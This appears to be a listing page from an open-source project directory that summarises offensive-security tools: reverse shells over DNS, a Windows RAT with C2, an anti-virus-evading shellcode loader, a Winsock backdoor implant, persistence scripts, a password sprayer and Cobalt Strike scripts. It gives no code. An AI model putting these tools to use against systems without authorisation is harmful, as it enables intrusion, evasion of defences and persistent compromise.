Displaying 1 to 20 from 25 results

LOLBAS - Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)

  •    XSLT

There are currently three different lists. The goal of these lists are to document every binary, script and library that can be used for Living Off The Land techniques.

sherlock - 🔎 Hunt down social media accounts by username across social networks

  •    Python

Accounts found will be stored in an individual text file with the corresponding username (e.g user123.txt). If you are using Anaconda in Windows, using 'python3' might not work. Use 'python' instead.

chashell - Chashell is a Go reverse shell that communicates over DNS

  •    Go

Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks. It comes with a multi-client control server, named chaserv.


  •    HTML

GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. Browse the project here.

serpentine - C++/Win32/Boost Windows RAT (Remote Administration Tool) with a multiplatform Java/Spring RESTful C2 server and Go, C++/Qt5 frontends

  •    C++

Disclaimer: serpentine is created for educational and research purposes, and is only intended to be employed in legal red team operations. Malicious and illegal use is not condoned and author/contributors do not take any responsbility for any damage caused by malicious actors using any software presented herein. serpentine is a Windows RAT (Remote Administration Tool) that lets you interact with the clients using a multiplatform RESTful C2 server.

gray_hat_csharp_code - This repository contains full code examples from the book Gray Hat C#

  •    CSharp

This repository contains fully-fleshed out code examples from the book Gray Hat C#. In this book, a wide variety of security oriented tools and libraries will be written using the C# programming language, allowing for cross-platform automation of the most crucial aspects of a security engineer's roles in a modern organization. Many of the topics will also be highly useful for hobbyists and security enthusiasts who are looking to gain more experience with common security concepts and tools with real world examples for both offensive and defensive purposes. We cover a broad slice of concepts a modern security engineer must be familiar with, starting with a brief introduction to the C# language. After the introduction, we focus on fuzzing web application vulnerabilities and writing exploits for them. This is followed by C# payloads for pentesters to use for remote command execution and persistence. Then, we move onto security tool automation using true APIs, not just calling programs from the system shell. Finally, we focus on reverse engineering and forensics in the final chapters.

go-shellcode - Load shellcode into a new process

  •    Go

This is a program to run shellcode as its own process, all from memory. This was written to defeat anti-virus detection. Keep in mind that only 64bit shellcode will run in a 64bit process. This can't autodetect your shellcode architecture.

HoleySocks - Cross-Platform Reverse Socks Proxy in Go

  •    Go

A simple cross-platform reverse socks proxy. It's possible to embed all the required parameters to start and forward the socks server with SSH so that cli flags are not needed. Do this by creating config/ssh.json and using the -X main.static=1 ldflag.

doxycannon - A poorman's proxycannon and botnet, using docker, ovpn files, and a dante socks5 proxy

  •    Python

Doxycannon takes a pool of OpenVPN files and creates a Docker container for each one. After a successful VPN connection, each container spawns a SOCKS5 proxy server and binds it to a port on the Docker host. Combined with tools like Burp suite or proxychains, this creates your very own private botnet on the cheap. Use the --single flag to bring up your proxies and create a proxy rotator.

gorsh - A Golang Implant and Tmux-driven C2 Interface

  •    Go

Learn go. Make a throwaway reverse shell for things like CTFs. Learn about host-based OPSEC considerations when writing an implant. Check out the official documentation for an intro to developing with Go and setting up your Golang environment (with the $GOPATH environment variable).

ruse - a secure and highly-portable reverse proxy (redirector) for your Red Team infrastructure.

  •    Go

Ruse is secure, multi-platform, selective Reverse Proxy (or Redirector) that is fast and easy to deploy. It can help you concealing C2 communications, and reverse shells traffic using the HTTP protocol. Ruse combines the core features of Python's SimpleHTTPServer, Apache's mod_rewrite, and SSL ProxyPass, all in a single, self-contained and highly-portable executable.

RedTeam - One line PS scripts that may come handy during your network assesment

  •    PowerShell

The above PS file will help to get the list of Domain Controller in a network, and will create a csv file in C: drive This can be used during Network Pentesting or such other situtations. This runs Mimikatz PS script by directly pulling it from Github and executing it "in memory" on your system.

MalwarePersistenceScripts - A collection of scripts I've written to help red and blue teams with malware persistence techniques

  •    PowerShell

A collection of scripts I've written to help red and blue teams with malware persistence techniques. I take no responsibility for how they're used. These are techniques that I regularly use to ensure that my agents can survive reboots. Majority of my persistence scripts are written in PowerShell since it's an excuse for me to learn it. May these scripts help you evade many a blue team.

DNS-Persist - DNS-Persist is a post-exploitation agent which uses DNS for command and control.

  •    C++

DNS-Persist is a post-exploitation agent which uses DNS for command and control. The server-side code is in Python and the agent is coded in C++. This is the first version, more features and improvements will be made in the future. DO NOT USE THIS SOFTWARE FOR ILLEGALL PURPOSES.

MalwLess - Test Blue Team detections without running any attack.

  •    CSharp

MalwLess is an open source tool that allows you to simulate system compromise or attack behaviours without running processes or PoCs. The tool is designed to test Blue Team detections and SIEM correlation rules. It provides a framework based on rules that anyone can write, so when a new technique or attack comes out you can write your own rules and share it a with the community. These rules can simulate Sysmon or PowerShell events. MalwLess can parse the rules and write them directly to the Windows EventLog, then you can foward it to your event collector.

WSAAcceptBackdoor - Winsock accept() Backdoor Implant.

  •    C

This project is a POC implementation for a DLL implant that acts as a backdoor for accept Winsock API calls. Once the DLL is injected into the target process, every accept call is intercepted using the Microsoft's detour library and redirected into the BackdooredAccept function. When a socket connection with a pre-defined special source port is establised, BackdooredAccept function launches a cmd.exe process and binds the accepted socket to the process STD(OUT/IN) using a named pipe.

trident - automated password spraying tool

  •    Go

This diagram was generated using Diagrams. The Go gopher was designed by Renee French and is licensed under CC BY 3.0. Deploying trident requires a Google Cloud project, a domain name (for the orchestrator API), and a Cloudflare Access configuration for this domain. Cloudflare Access is used to authenticate requests to the orchestrator API.

AggressorScripts_0x727 - Cobalt Strike AggressorScripts For Red Team

  •    PowerShell

Aggressor Script is the scripting language built into Cobalt Strike, version 3.0, and later. Aggresor Script allows you to modify and extend the Cobalt Strike client. Aggressor Script is the scripting language built into Cobalt Strike, version 3.0, and later. Aggresor Script allows you to modify and extend the Cobalt Strike client.